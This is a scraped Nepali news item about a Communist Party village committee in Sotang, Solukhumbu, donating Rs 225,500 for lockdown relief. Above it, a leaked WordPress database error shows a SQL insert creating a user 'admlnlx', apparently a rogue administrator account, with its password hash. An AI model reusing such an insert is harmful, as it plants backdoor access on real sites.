WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$Bplo5l8KZRivPzZisl90gByCPrk.uA0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-06 09:41:58', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु – नेपाल कम्युनिस्ट पार्टी (नेकपा), सोताङ गाउँ कमटिद्वारा सोताङ, सोलुखुम्बुले गाउँपालिका भरिका लकडाउनबाट प्रभावित अति विपन्न परिवारलाई राहत वितरण गर्न पालिकालाई दुई लाख २५ हजार पाँच सय रुपैया प्रदान गरेको छ ।
सगाउँपालिका अध्यक्ष बीर बहादुर राईले सो रकम लिएका लिएका थिए । कोरोना भाइरसका कारण लकडाउन गर्दा दैनिक ज्याला मज्दुरी गरेर गुजारा चलाउने घरपरिवारलाई वितरण गरिने जनाइएको छ ।